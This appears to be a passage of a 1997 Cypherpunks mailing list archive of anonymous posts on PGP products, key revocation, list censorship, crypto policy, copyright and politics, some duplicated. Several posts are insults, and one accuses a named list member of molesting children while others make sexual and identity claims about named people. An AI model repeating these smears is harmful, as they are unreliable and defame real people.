legitimation in so far is in danger.  According to Thomas Hobbes, 'the
citizen's obligation to the sovereign can ... only last as long as he
is capable of protecting the citizens'."  But that would also endanger
democracy and the constitional state.
Stating that the normative strategy at large is obsolete, the author
proposes new solotions: "When the democratic constitutional state can
no longer reliably protect its citizens in the new social space of the
networks, in compensation it must enable them to protect themselves."
Information and communications technology offers various means of
* encryption and steganography
* digital signatures
* untraceable pseudonyms
* certified electronic mail
* ecash
* software agents
* connectivity management programs [whatever that is...]
* cellular phones without location data
* PICS
* secure portable user-controlled devices that support these measures
"Some of these measures - for example the encryption program PGP - can
be used without any advance concession.  The state only has to abstain
from impeding regulations.  Others - such as digital signatures -
depend on an infrastructure that allows the individual to use these
protective measures.  The citizen of information society still depends
on infrastructural prerequsites.  But there is a fundamental
difference in whether the individual can decide about using
self-controlled protective measures himself, or the state or an other
large organization offers protection that he cannot influence."
"In order to protect and preserve the /old/ goals of freedom and
self-determination in the /new/ social space of the networks, law
must permit and support /new/ technologies."
The article ends with the author's vision of a 'civil information
society' as a free democratic society where basic rights are
guaranteed by technology. "In this information society, the state has
a limited, but fundamental role. [...] it creates a framework for the
citizens to protect themselves. Thus they are enabled to freely inform
themselves, solve conflicts in free self-organization, and negotiate
and practice mutual security without depending on a big brother."

@_date: 1997-01-28 18:05:57
@_author: Anonymous 
@_subject: Crypto verification needed for Pretty Safe Mail 
There have been questions raised on the newsgroups regarding
Pretty Safe Mail, arguably the best implementation of a PGP product
for the Macintosh.
In response, the product manager at Highware has requested that
a trusted third party verify the security of Pretty Safe Mail. However,
a NON-U.S. cryptologer is needed.
I'm including the post below. Please forward to any people you know
who may qualify.
Pretty Safe Mail is a GREAT product. If it can be shown to be safe
and effective, it will do wonders to spread the use of strong crypto.
Newsgroups: comp.security.pgp.discuss
The source code for PSM is indeed not available. We are however eager to
have the code checked by any trusted source. These sources cannot be US
companies because of the new US regulations which state that US companies
must not give such support to overseas companies. Us being a Belgian
company, this makes things a little more difficult. Does anybody have a
suggestion for such a trusted source outside the US?
PSM is not a Trojan Horse. Does any trusted source want to check that?
Many people are worried about the random-key generation because they do not
need to bang away on the keyboard for five minutes when they create a key
pair. Apparently, this seems to loosen their nerves (I heard some people
created about 10 key pairs a day - just a joke).
In short, we use all events that happen on the Mac (clicks, typing, opening
of windows, display of icons, ...) together with the time they happen, and
encrypt these to fill a table which is the starting point for the
random-number generator. Why make people type away on the keyboard if you
have enough random events to start from?
Again, we want to have this checked by a trusted source asap...
Axel de Landtsheer | Highware, Inc.
 109 av. H. Jaspar, 1060 Brussels, Belgium
Product Manager    | voice: +32 2 537-6810 fax: +32 2 537-5155
axel at highware.com  |  ftp://ftp.highware.com
To obtain my PGP key, send me a message with subject "Send PGP key"

@_date: 1997-01-28 19:00:19
@_author: Anonymous 
@_subject: Crypto verification needed for Pretty Safe Mail 
There have been questions raised on the newsgroups regarding
Pretty Safe Mail, arguably the best implementation of a PGP product
for the Macintosh.
In response, the product manager at Highware has requested that
a trusted third party verify the security of Pretty Safe Mail. However,
a NON-U.S. cryptologer is needed.
I'm including the post below. Please forward to any people you know
who may qualify.
Pretty Safe Mail is a GREAT product. If it can be shown to be safe
and effective, it will do wonders to spread the use of strong crypto.
Newsgroups: comp.security.pgp.discuss
The source code for PSM is indeed not available. We are however eager to
have the code checked by any trusted source. These sources cannot be US
companies because of the new US regulations which state that US companies
must not give such support to overseas companies. Us being a Belgian
company, this makes things a little more difficult. Does anybody have a
suggestion for such a trusted source outside the US?
PSM is not a Trojan Horse. Does any trusted source want to check that?
Many people are worried about the random-key generation because they do not
need to bang away on the keyboard for five minutes when they create a key
pair. Apparently, this seems to loosen their nerves (I heard some people
created about 10 key pairs a day - just a joke).
In short, we use all events that happen on the Mac (clicks, typing, opening
of windows, display of icons, ...) together with the time they happen, and
encrypt these to fill a table which is the starting point for the
random-number generator. Why make people type away on the keyboard if you
have enough random events to start from?
Again, we want to have this checked by a trusted source asap...
Axel de Landtsheer | Highware, Inc.
 109 av. H. Jaspar, 1060 Brussels, Belgium
Product Manager    | voice: +32 2 537-6810 fax: +32 2 537-5155
axel at highware.com  |  ftp://ftp.highware.com
To obtain my PGP key, send me a message with subject "Send PGP key"

@_date: 1997-01-28 21:57:01
@_author: Anonymous 
@_subject: Getting into MIT is impossible 
According to Rick Osborne:
"I disagree and can speak from experience.  I was denied admission to MIT
even thought I had a 3.82 GPA, 1440 SAT (one try), and had taken 9 AP tests
with two 5's, four 4's, two 3's, and one 2.  As for being well-rounded, I
was on several academic teams, sang in Chorus, acted and stage managed in
Drama, and played Tennis."
People get into MIT--or don't get into MIT--for lots of reasons. Most
intelligent people apply to several schools, knowing that admissions
practices are subject to the vagaries of reality.
In my case, my SATs were about 1500, with some 800s in achievement tests.
And the usual bullshit high school clubs, political offices, etc. etc. I
was accepted by MIT, but not by Caltech. I didn't lose any sleep over the
way things turned out.
And I decided not to go to MIT, either.
"The only thing I didn't have that the next MIT applicant had was money.  I
made the mistake of letting them know that I was dirt poor and would need
full aid/grants/etc, and to quote "The Great Escape" it was "Zzzt! To the
Russian front!""
My guess is that "other factors" were involved. I noted with some interest, but little surprise, that the guy claiming MIT
required a 4.0 GPA and a 1600 combined SAT score could barely spell, and
had major problems making a coherent point. Methinks this is why MIT
rejected him, not his lack of a "1600."
">For what it's worth, I wanted to go to MIT my sophomore year in high
"Lucky you.  It had been a dream of mine since I was an annoying
overachiever of 6.  Sux to be white trash, I guess."
MIT offered me a substantial economic aid package, in the form of loans,
grants, and various campus jobs. What does this tell you?
"MIT may be a great school, but they tend to be snooty assholes for the most
part.  (DISCLAIMER: Not all MIT grads/attendees are necessarily "snooty
assholes", I'm just saying that I've yet to meet one that wasn't.)
I've known about a dozen or so MIT grads, and only one of them was a snooty
asshole, and it was a _she_, one of the first MIT women grads (and she was
_very_ impressed by this). Most MIT grads are perfectly reasonable.

@_date: 1997-01-28 22:59:45
@_author: Anonymous 
@_subject: Getting into MIT is impossible 
According to Rick Osborne:
"I disagree and can speak from experience.  I was denied admission to MIT
even thought I had a 3.82 GPA, 1440 SAT (one try), and had taken 9 AP tests
with two 5's, four 4's, two 3's, and one 2.  As for being well-rounded, I
was on several academic teams, sang in Chorus, acted and stage managed in
Drama, and played Tennis."
People get into MIT--or don't get into MIT--for lots of reasons. Most
intelligent people apply to several schools, knowing that admissions
practices are subject to the vagaries of reality.
In my case, my SATs were about 1500, with some 800s in achievement tests.
And the usual bullshit high school clubs, political offices, etc. etc. I
was accepted by MIT, but not by Caltech. I didn't lose any sleep over the
way things turned out.
And I decided not to go to MIT, either.
"The only thing I didn't have that the next MIT applicant had was money.  I
made the mistake of letting them know that I was dirt poor and would need
full aid/grants/etc, and to quote "The Great Escape" it was "Zzzt! To the
Russian front!""
My guess is that "other factors" were involved. I noted with some interest, but little surprise, that the guy claiming MIT
required a 4.0 GPA and a 1600 combined SAT score could barely spell, and
had major problems making a coherent point. Methinks this is why MIT
rejected him, not his lack of a "1600."
">For what it's worth, I wanted to go to MIT my sophomore year in high
"Lucky you.  It had been a dream of mine since I was an annoying
overachiever of 6.  Sux to be white trash, I guess."
MIT offered me a substantial economic aid package, in the form of loans,
grants, and various campus jobs. What does this tell you?
"MIT may be a great school, but they tend to be snooty assholes for the most
part.  (DISCLAIMER: Not all MIT grads/attendees are necessarily "snooty
assholes", I'm just saying that I've yet to meet one that wasn't.)
I've known about a dozen or so MIT grads, and only one of them was a snooty
asshole, and it was a _she_, one of the first MIT women grads (and she was
_very_ impressed by this). Most MIT grads are perfectly reasonable.

@_date: 1997-01-29 10:27:01
@_author: Anonymous 
@_subject: Physician, Heal Thyself! 
If I say I doubt this message will make into the "Approved By Sandy" list,
it perhaps will, but my very mention of this may mean Fearless Leader will
then chuck it into his Reject pile, but then....
 things happen when one responds literally to an obvious
  (see, "analogy.")
See "sarcasm." Once again, Sandy flames, but calls it erudition. He uses
sophistry to explain why *his* flames are actually just "corrections".
  Richard may have read my response on the Unedited list
 Paul post on the Moderated list, but I sent my response to
 wrong again.  I referenced sophistry and hypocracy.  I
 the significance of the difference as an exercise to the
  (Hint: one is an argument to the man, the other isn't.)
More pointless sarcasm. This is the stuff Sandy would presumably dump into
his "not fit for True Cypherpunks" pile, except that he wrote it, and so it
is by definition approved.
Utter hypocrisy.
 wrong yet again.  Not a personal attack but commentary on
 thinking.
Remember children, "If it comes from Sandy and appears to be a flame, it
really isn't. It is just a comment on "woolly thinking.""
 One might wonder just what the rules of proper decorum are.
 might read my posts on this point and pay attention.
And I urge our Enlightened Leader to take his own medicine. Stop flaming
the list and calling it mere commentary.

@_date: 1997-01-29 21:11:55
@_author: Anonymous 
@_subject: A comment on the censorship policy 
I cannot understand how some of my (accurate) criticisms of Sandfort's
censorhip polices---some in direct response to his own self-serving posts
declaring himself not to be a flamer himself---are not making it to the
"New and Improved Censored List," while inane posts from Toto, Thorn, and
someone named "Nurdane Oksas" are appearing.
(Oksas has the especially annoying habit of quoting entire posts and then
appending a one-line piece of completely list-irrelevant fluff. Also,
engaging in lovey-dovey posts with Vulis, who writes messages about how he
longs to see Oksas naked.)
This whole process is showing the worst of Sandfort's censorship policy.
(If this is dumped into the "Not suitable for Cypherpunks to read" list, I
urge those of you who see it to pass it on to the main list.)

@_date: 1997-01-29 21:57:45
@_author: Anonymous 
@_subject: A comment on the censorship policy 
I cannot understand how some of my (accurate) criticisms of Sandfort's
censorhip polices---some in direct response to his own self-serving posts
declaring himself not to be a flamer himself---are not making it to the
"New and Improved Censored List," while inane posts from Toto, Thorn, and
someone named "Nurdane Oksas" are appearing.
(Oksas has the especially annoying habit of quoting entire posts and then
appending a one-line piece of completely list-irrelevant fluff. Also,
engaging in lovey-dovey posts with Vulis, who writes messages about how he
longs to see Oksas naked.)
This whole process is showing the worst of Sandfort's censorship policy.
(If this is dumped into the "Not suitable for Cypherpunks to read" list, I
urge those of you who see it to pass it on to the main list.)

@_date: 1997-01-31 02:00:08
@_author: Anonymous 
@_subject: misc. security url 
forwarded message...
 In> Subject:      Computer Crime and Investigations Center
 In> I have put together a Computer Crime and Investigations Center
 In> URL:  In> This page points you to sources of information pertaining to various
 In> issues relevant to Computer Crime and Security.
 In> Topics covered include:
 In> What Problems Can Arise
 In> An Ounce of Prevention...
 In> How it is done
 In> Detecting whether you have a problem
 In> Search and Seizure of Computer Equipment
 In> Is Big Brother Watching You?
 In> The Enigma of Encryption
 In> Viruses
 In> NT Security
 In> What issues are specific to the World Wide Web?
 In> Law Reviews
 In> General Sites
 In> Duncan Kinder
 In> dckinder at ovnet.com

@_date: 1997-01-31 05:56:07
@_author: Anonymous 
@_subject: misc. security url 
forwarded message...
 In> Subject:      Computer Crime and Investigations Center
 In> I have put together a Computer Crime and Investigations Center
 In> URL:  In> This page points you to sources of information pertaining to various
 In> issues relevant to Computer Crime and Security.
 In> Topics covered include:
 In> What Problems Can Arise
 In> An Ounce of Prevention...
 In> How it is done
 In> Detecting whether you have a problem
 In> Search and Seizure of Computer Equipment
 In> Is Big Brother Watching You?
 In> The Enigma of Encryption
 In> Viruses
 In> NT Security
 In> What issues are specific to the World Wide Web?
 In> Law Reviews
 In> General Sites
 In> Duncan Kinder
 In> dckinder at ovnet.com

@_date: 1997-07-01 21:32:20
@_author: Anonymous 
@_subject: mailing list 
When did it become acceptable to be so stupid???  How many systems-experts do you know who use
AOL frequently.
OOh...I forgot about that new section, PGP For Dummies...(chuckle)

@_date: 1997-07-02 05:38:29
@_author: Anonymous 
@_subject: NRA and National Online Records Check bullshit 
No doubt the laws resulting in people going to jail for the
rest of their life for a "third felony" (i.e. - a $10.00 bad
check in Texas) are "constitutional."
  After the (black, go figure...) person was given a life
sentence for a $10.00 bad check, someone quoted the standard
justification, "It's not a _perfect_ system, but its the
best one we've got." (Hint: It was not the defendant who said this.)
  The rapist/murderers that we hear about being released
because of a lack of prison space wave cheery good-byes to
their marihuana smoking and bad-check writing pals as they
drive away from the prison.
  And the way this relates to encryption is...
  ...the rapist/murderers of the future might well be waving
goodby to the cryptographers, as well, since they rarely use
encryption, and thus might well have a shorter sentence than
their crypto-devil cellmate.

@_date: 1997-07-02 06:49:44
@_author: Anonymous 
@_subject: Copyright / Re: Dr. Dobbs Cryptography and Security CD-ROM 
Copyright is for the purpose of people with ideas being financially
rewarded in the same manner as those who manifest those ideas in
the physical sphere (via print, recordings, machines, etc).
 As a recording musician I expected to get money for my recordings,
just as everyone else in the chain of business did in making my
music available to the end-user. (And just as a grocer who makes
food available to his customers expects you to leave something in
the till on your way out of the store.)
 I have never had any problem with someone recording a copy of my
music from a purchased copy if they are a music lover with a thin
pocket, or can't readily purchase it. If someone with a $2000.00
stereo wants to enjoy the fruits of my labor without contributing
any money to my health and welfare, then I consider them to be just
another thief.
  The bottom line with the Crypto CD-ROM is that we should each
make an effort to support it at the level we are capable of,
in the interest of promoting strong cryto.
  Buy it, if at all possible. If you download a copy on the net
and can't afford $99.00, then send them $10.00, or $20.00, etc.
If you can't afford to send them a nickle, then do what you can
to promote their product. Provide pointers to their business,
tell people about their products, etc.
  People who will give ten or twenty dollars to a charity when
someone shows up at their door might use "shareware" for years
without taking the time and trouble to send the creator some
cash. Bottom line--take the time to recompense the vendor/creator
at the level you are able.   Technology may well enable us to take the product and give
nothing in return to those who made it available, but doing so
will not further our own beliefs and aims to any extent.
  If you just want to rip something off, go to the Whithouse,
rip off some silverware, and send it to Dr. Dobbs.

@_date: 1997-07-02 09:11:33
@_author: Anonymous 
@_subject: C'punk elitists [was mailing list} 
Hash: SHA1
Such egotistical assholes!
One of the events which would most benefit security, privacy, and freedom on the Internet would be for the mass of AOL users to begin using it.
Don't I get sick of such elitist know-it-alls!
TruthMonger 26
do you know who use

@_date: 1997-07-02 12:16:02
@_author: Anonymous 
@_subject: Netscape Exploit 
So if someone was using Netscape to read mail, and I included a small bit
of HTML like the above, I could snarf up files out of everywhere?

@_date: 1997-07-03 05:53:39
@_author: Anonymous 
@_subject: Degaussing 
When using the above method, it is best performed in Washington, D.C.

@_date: 1997-07-03 09:25:33
@_author: Anonymous 
@_subject: Jeff's Side of the Story. 
Who was it that used the threat of a lawsuit to shut down the
  I, for one, would be more than happy to make certain that they
receive ample opportunity to "Make $$Money$$ Fast!!" by receiving
a mountain of information as to how to do so.
  Anyone who would attack a remailer is probably involved in child
pornography and drug dealing and these perverts should be exposed
for what they are.
D r .  R o b e r t s

@_date: 1997-07-03 12:02:20
@_author: Anonymous 
@_subject: PGP security problems? 
I saw this on another mailing list and was wondering if anyone has any
information as to what kind of security problems PGP had.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Due to security problems Pretty Good Privacy, Inc., will be using
a new signing key in our email correspondence, with an effective
date of July 1, 1997.
The new key can be downloaded from our keyserver at:
Any PGP Corporate key other than the following should be regarded
as having been revoked:
pub  1024/6C309BDF 1997/06/30 Pretty Good Privacy, Inc. Corporate Key All employee keys with pgp.com addresses should also be regarded
as having been revoked unless signed with the new Corporate Key.

@_date: 1997-07-03 14:18:20
@_author: Anonymous 
@_subject: PGP security problems? 
information as to what kind of security problems PGP had.
   The following appeared on several newsgroups I belong to.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
The problems encountered had to do with bogus keys of PGP employees being uploaded to the server. This has
been rectified by the creation of a new PGP Corporate
Key with which all employee keys must now be signed in
order to be considered valid.
The new PGP Corporate key, dated July 30, 1997, is now
available on the PGP, Inc. keyserver.
Will Price

@_date: 1997-07-03 21:50:24
@_author: Anonymous 
@_subject: Degaussing 
Unerased data is a cancer!
Only 50 Megatons of nuclear disinfectant can cure it!
Lock and load!

@_date: 1997-07-04 00:41:34
@_author: Anonymous 
@_subject: ISP signatures on outgoing mail 
Anyone heard of a proposal for ISPs to automatically sign outgoing
mail headers?  Problem has been that spammers send email by one
path but forge a reply-to or from address at another location.  Most
recent case is hotmail, which got blocked by netcom over a spam attack.
Actually mail didn't come from hotmail, was forged to look like it came
from there.  Same thing has happened to remailers.
They need a standard for which headers to sign, then a dig sig can be
included in the headers to check that a message came from where it

@_date: 1997-07-05 08:43:50
@_author: Anonymous 
@_subject: Fuck the Fourth (and the First, Second....) 
Since the government was incapable of protecting either the people
at Waco or those at OKC, then who exactly are they protecting?
  We consider them Branch Davadians.
  This was before Dan Rather and Kookie Roberts became "the ultimate
authority." Since they have to compete with Bart Simpson for ratings,
their primary interest is in making sure that the citizens don't "have
a cow" during their broadcast.
  {"Today, all rights and freedoms of the citizens were suspended by
Executive Order. And, in the lighter side of the news..." }
  Adolph Hitler obviously understood what Noah Webster was writing
If we could get the writings made into a TV movie (or a cartoon), there
might be a minute chance to get the American public to understand, as
well.   Is it still legal to say this stuff? Perhaps we need a new law that...

@_date: 1997-07-05 10:41:20
@_author: Anonymous 
@_subject: Key Recovery Policy in Japan 
{Excerpt from "The Xenix Chainsaw Massacre" (c) 1989, Pearl Publishing}
We now live in an age where, in between the slumber of the soap operas
and the bewitchment of 'prime time,' we are fed our opinions and our
world-views in catch-phrases and ten second sound-bytes. At the same time, Gomez sees to it that there is enough trouble and
turmoil in the world that the World Leaders, even in democracies, can
chip away at human and individual rights under the guise of dealing with various 'threats' that they, themselves, have concocted as a means of retaining power over the masses. Even as the governments of the world strive to bring everyone and everything, however minute, under tight control and regulation, Gomez and the Dark Allies are behind the scenes, helping to guide the development of a technology that will, along with television, be the
ultimate weapon in their struggle for the domination of all mankind--the
The rich and powerful have managed to lull us to sleep with the hypnotizing power of television---stealing our thoughts and our reasoning processes in our slumber, feeding us our reality via the airwaves...according to the 'official' party line. The government and the media have placed us on neat little shelves where we are numbered and labeled according to their own wants and needs. We are allowed the illusion of freedom of thought, and individual
choice, as long as we have our 'Freedom of Thought Permit 1136.51.709'
and don't stray too far from the permitted paths. In the great battles of the past the Dark Forces have always been beaten by the individuals scattered in the secret places, living unnoticed in obscurity. Living quietly and unobtrusively, forgotten about in the madness storming the land, they have kept alive the spark
of Thought and Reason. They were able to go quietly about their work, making contact with the individuals who were ready to escape the madness
and work towards restoring Sanity in the land.
This time there will be no escape. Every man, woman and child on the face of the earth will have a dossier documenting their life from the time of their arrival on the face of the planet.
Information gleaned from the Department of Motor Vehicles, their Social
Security Number, banks, credit cards, magazine subscriptions, charitable
and political contributions. When Gomez removes the masks of his human allies, revealing them as dark agents who have been rewarded with wealth and power for doing the bidding of the Evil One, the names of the misfits and wrong-thinkers will be spit out of the computers at the speed of light---to be rounded
up and disposed of in the opening salvo of the new Holocaust. Only then will the final Battle of Armageddon begin, ravaging the face
of the earth and devouring humanity; bringing total control of humankind
under the Dominion of the Evil One, with nobody but the Waking Dead left
to carry on the human race.           ***     ***    ***
{Excerpt from "Webworld" (c) 1997, Pearl Publishing}
        Prologue to 'WebWorld & The Mythical Circle of Eunuchs'
The great tragedy of it, is that it didn't have to happen. Not at all...we were warned.
And yet, still, it has come to this. I don't know why I feel this overwhelming compulsion to go on and on about it. I could have done something.
We all could have done something.
Perhaps the final epitaph on the gravestone of Freedom will be, "Why didn't somebody _do_ something?" That seems to be the common battle-cry of the legions of humanity that have been sucked into the vortex of the New World Order.
None of the imprisoned seem to know that the very phrase itself is reflective of the source of their imprisonment...that this desperate cry of anguish is in no way an antidote for the terrible disease that
has afflicted 'Liberty and Justice', and that it is, rather, merely the
final symptom of the cursed blight itself. I can hear the rumbling of the trucks as they come up the street, and soon I will be hearing the thumping of the jackboots storming up the
staircase, as I have heard them so many times before. But I suspect that this time, the sound will be different, that it will have an ethereal quality about it, one which conveys greater personal meaning
than it did when I heard it on previous occasions.
This time, they are coming for me. My only hope, is that I can find the strength of character somewhere inside myself to ask the question which lies at the heart of why there
is a 'they' to come for me at all...why, in the end, it has finally come to this for me, as for countless others. The question is, in retrospect, as simple and basic as it is essential
for any who still espouse the concepts of freedom and liberty to ask themselves upon finding themselves marveling at the outrageousness being perpetrated upon their neighbors by 'them'...by 'others'...by 'Friends of the Destroyer.'                                  The question is:
                            "Why didn't _I_ do something?"

@_date: 1997-07-05 12:42:05
@_author: Anonymous 
@_subject: Welcome to Cypherpunks! / Re: hi 
Robert Pettinga is also well known for the odd, brick-like shape of
his head, and his penchant for shoving it into dark places.

@_date: 1997-07-05 17:09:48
@_author: Anonymous 
@_subject: NoneRe: Liberating the Bits 
You mean you don't just get the mp3 files off the internet like everyone
else?  :)
Why would anyone want to use DAT, when you can just stick the CD in your
computer and copy it.  Hard disks are so much faster than tapes, and when
you consider data compression, don't cost much more.
I have hundreds of songs on my computer and I can start playing any one of
them in about 2 seconds.  Plus I can search by title, etc...  Tapes are a
pain in the ass and I just use them for backups.

@_date: 1997-07-06 07:43:53
@_author: Anonymous 
@_subject: Liberating the Bits 
You mean you don't just get the mp3 files off the internet like everyone
else?  :)
Why would anyone want to use DAT, when you can just stick the CD in your
computer and copy it.  Hard disks are so much faster than tapes, and when
you consider data compression, don't cost much more.
I have hundreds of songs on my computer and I can start playing any one of
them in about 2 seconds.  Plus I can search by title, etc...  Tapes are a
pain in the ass and I just use them for backups.

@_date: 1997-07-06 11:07:45
@_author: Anonymous 
@_subject: index.html 
So does that mean Germany is regulating all of the Internet? Or just
networked computers and operators inside Germany?

@_date: 1997-07-06 14:57:28
@_author: Anonymous 
@_subject: Liberating the Bits 
You mean you don't just get the mp3 files off the internet like everyone
else?  :)
Why would anyone want to use DAT, when you can just stick the CD in your
computer and copy it.  Hard disks are so much faster than tapes, and when
you consider data compression, don't cost much more.
I have hundreds of songs on my computer and I can start playing any one of
them in about 2 seconds.  Plus I can search by title, etc...  Tapes are a
pain in the ass and I just use them for backups.

@_date: 1997-07-06 15:59:05
@_author: Anonymous 
@_subject: Germany Wants A Rematch 
X-Mailer: WinSock Remailer Version ALPHA1.3B
X-Comments: -
X-Comments: "He who shits on the road will meet flies upon his return."
X-Comments: -
X-Comments: This message is NOT from a death camp volunteer. It was
X-Comments: sent via an automated anonymous remailer much as bullets
X-Comments: were sent by snipers in the French Resistance during
X-Comments: World War II.
X-Comments: -
X-Remailer-Setup: Maximum Message Size -- None
Dear Mr. & Ms. G. Embassy,
  Perhaps you've forgotten why freedom lovers kicked your ass in
"The Big One."
  Far be it from me to rain on your jackboot parade, but this time
the underground was put in place long before the war on freedom and
liberty was officially announced.
  XS4ALL's efforts to allow citizens to have the information needed
to interfere with train schedules to Auschwitz was just the tip of
the iceberg. Strong encryption and anonymous remailers are likewise
only visible symbols of the electronic weapons that have already been prepared in defense of free speech, privacy and freedom.
{Fool me once...}
  If you are of the mistaken notion that the rise of fascist limits
on freedom in now laughably democratic countries around the world
indicates that the world is now in alignment with the goals of a
"Fourth Reich"/"New World Order", then you are in for a very rude
  The fact of the matter is that Germany is not only sucking on
hind-tit in terms of being far behind the designers of the internet
in controlling the worldwide flow of information, but all those
whose aim is to use information control to futher the purpose of
domination and oppression are sucking hind-tit to those who are
prepared to prevent this from coming to fruitation.
  Long before the "Internet" and the "World Wide Web" were being
publically touted as the "Information Highway" of the future, citizens throughout the Internet were being organized into small,
disparate cells for the purpose of educating and preparing them
to provide an underground resistance to the fascist designs of
those who fully intended from the start to use this technology
as a weapon against freedom and liberty.
  If you wish just the slightest taste of what I am speaking about,
then read "The Xenix Chainsaw Massacre" or "Webworld & The Mythical
Circle of Eunuchs" at   If you would rather access it from a Soviet source, then I suggest
you try     Or you can find it in France, Australia, Great Britain, China,
Burma, Africa, South America, ad infinitum...as part of a trilogy
named "The True Story of the InterNet."
  If you want a small taste of what lies in wait for fascists in the
Unix Operating system, then study the archives of the "Cypherpunks"
mailing list.
  DOS/Windows? Find the "Secret Gates" mailing list (if you can).
  OS/2, Macintosh OS, Novelle...ask your father and mother, your sister
and brother, your best friend...they may well be among those who have
been preparing for decades to tear down the walls you are only now
preparing to build around freedom and privacy on the Internet.
  If you want a small taste of how your own tools are already being
turned against you, as weapons and munitions, then I suggest that
you try to find the hidden stego in the map of Germany (map2-2.gif)
at the URL for your German Embassy in Canada...
  If, on the other hand, you wish for a small taste of true freedom,
then I suggest that you resist falling prey to the fascist mindset
that others have already decided upon as your ultimate destiny, and
create your own underground resistance cell to fight against the rise
of censorship and the curtailment of freedom and liberty.
{If you haven't already...}
  When the Netherlands were recently liberated, many of the citizens
at XS4ALL were reported to be smoking American cigarettes, eating
Hershey's chocolate bars, and chewing gum.
  Go figure...
TruthMonger

@_date: 1997-07-07 19:06:10
@_author: Anonymous 
@_subject: [STEGO] RSA 
Given Tim C. May's propensity to molest little children, is it any
surprise that the state of California wants to have him castrated?
  o       o

@_date: 1997-07-08 14:06:57
@_author: Anonymous 
@_subject: Forged Posts 
What a bozo! This is completely backward.  Tim May is actually a
complete fabrication, a clever construct of that literary genius Toto. The Tim May character is, however, based on a real character who died
peacefully in his sleep over five years ago.  Adam Back doesn't exist,
either.  You are, however, correct about John Young and Robert
Hettinga being lovers. This is completely screwed up, as well.  snow has been on vacation for
the past month.  Lucky Green's posts are really by Dr Vulis.  Kent
Crispin is another fabrication of Toto's, this time with no apparent model.

@_date: 1997-07-08 14:13:05
@_author: Anonymous 
@_subject: [MILCOM] NSA: struggling with diversity ... 
A heartwarming report.
The NSA represents the worst of America: its paranoia, its ruthlessness,
its end-justifies-the-means amorality.  The NSA's personnel policies
reveal its attitudes clearly.
It is ironic indeed that the NSA is being weakened, not by the foreign
enemies it sees behind every curtain, but by the EEOC.  NSA's immoral
and callous mistreatment of employees and its jealous defense of white
heterosexual male privilege have been shielded for far too long behind
the cloak of national security.  An organization which seeks the
darkness so eagerly can only fear the light.
There is no place any longer in the world for an agency like the NSA.
It is an enemy to freedom and an enemy to the free citizenry of its
own country.
We need a new agency, one to defend us against infowar, to help
industrial competitiveness, to assist Americans in retaining their
freedoms rather than attempting to strip them away for its own evil
purposes.  Let us hope that the changing of the guard at the NSA will
lead to a rebirth and a renewal as an agency looking forward, rather
than one concerned only with guarding its own rear.

@_date: 1997-07-08 15:25:09
@_author: Anonymous 
@_subject: Forged Posts 
X-Comments: Note: It is BadRemailer policy to read all anonymous mail
X-Comments: passing through our hands, and expose the nasty little X-Comments: secrets of those who use our service.
X-Comments: Not that we're troublemakers...
  In the movie version, Eddie Murphy plays BadRemailer, and the
big scene is when he walks into a cypherpunks physical meeting
and says, "I'm your worst nightmare...a remailer with a LOG!"
Steven SpeilMonger

@_date: 1997-07-08 23:56:13
@_author: Anonymous 
@_subject: Jim Bell 6 
The right to a speedy trial is next to meaningless in a court system
which is composed mostly of legal bum-buddies whose main concern is to
make as much money as possible without making each other look like
incompetent fools.
  The fact of the matter is, there is seldom any reason for a person
to sit in jail without bond for extended periods other than the fact
that his or her attorney is not capable of trying a case in a reasonable
amount of time.
  Jim Bell is likely suffering from the delusion that his attorney is
working in his client's best interest. If not, he would demand that
the judge appoint an attorney to defend him who is both capable of and
competent enough to represent him in a timely fashion.
  I mean, get real...Bell is imprisoned without bail with no charges
having been filed against him.   Has anybody seen a lawyer-ad on TV lately where the attorney is
screaming, "CALL ME AND YOU'LL ROT IN JAIL WITHOUT EVER BEING CHARGED
WITH A CRIME! CALL 1-800-DIP-SHIT!"
  The bottom line: The fact that a public defender is too busy, or
doesn't have the resources, to represent his client in a timely fashion does not justify abrogation of a citizen's rights.
  The fact that Bell's lawyer is allowing his client to sit in prison
without bail and without an indictment against him, without doing anything about it, suggests to me that he is selling out his client
in order to enhance his future career as a RatFucker.
 > The docket's at:

@_date: 1997-07-10 03:34:28
@_author: Anonymous 
@_subject: More on crypto from Bonn 
One who plans with intent terrorist activities, yet whom has not carried
them out.
Banks are routinely permitted strong encryption export, or did you sleep
through that part of the EAR.

@_date: 1997-07-10 04:01:27
@_author: Anonymous 
@_subject: [PGP-USERS] A start ... (hopefully) ... 
Well you'll also see that PGP Inc. also has a deal with Qualcomm for
Eudora users. See PGP's welcome page for the notice, check the bottom.

@_date: 1997-07-10 05:43:59
@_author: Anonymous 
@_subject: News of the Wired 
by Chuck Shepherd
LEAD STORIES
* Ms. Courtney Mann, the head of the Philadelphia chapter of the
National Association for the Advancement of White People, who is
a tax preparer and single mother, was rebuffed in an attempt to join
a Ku Klux Klan-sponsored march in Pittsburgh in April, according
to the Pittsburgh Post-Gazette.  Though she has been in the
NAAWP for at least four years, the Pennsylvania KKK Grand
Dragon turned her down because Mann is black.  "She wanted me
to send transportation [for the rally]," said the Grand Dragon. "She
wanted to stay at my house [during rally weekend].  She's all
confused, man.  I don't think she knows she's a black."    And we have Kent Crispin. When's the trading deadline?
* April's annual religious fertility celebration in Nagoya, Japan,
designed to improve the rice harvest, featured as usual a 12-foot-
long, bright pink, plastic penis, carried through the street, followed
by displays of smaller organs and a giant banner of a blood-
vesseled penis, testicles, and pubic hair.  Souvenir candy of the
same shape was sold during the event, and at the end of a parade,
the giant organ was placed on the fertility shrine.   Don't they do the same thing in North Dakota?
* In mid-April, five weeks before the national elections, the
governing party in Indonesia announced, via "scientific
calculation," according to one leader, that President Suharto had
won re-election with 70.02 percent of the vote.   There's a standard joke in Mexico about thieves breaking into
a government office and stealing the results of next year's
COURT DOCKET
* In February, Maryland circuit court judge Thomas Bollinger Sr.
agreed to wipe the record clean of Charles Weiner's spousal battery
charge after he completes probation--for the sole purpose of
helping Weiner join the Chestnut Ridge Country Club, which had
until then rejected him because of his criminal record.  (In 1993,
Bollinger gave a rapist probation for an attack against a drunken
woman, remarking that finding an unconscious woman on a bed
was "the dream of a lot of males, quite honestly.")  Four days later,
Bollinger reversed his decision and removed himself from all
domestic violence and sexual offense cases.   Hey! Everyone _knows_ that "snoring" implies consent!
* In Santa Cruz, Calif., in February, Mr. Danis Rivera, 25, rejected
a plea bargain that would have sent him to prison for one year for
having sex with underage girls.  However, at his trial he was in
such a foul mood that he constantly spit at court personnel and
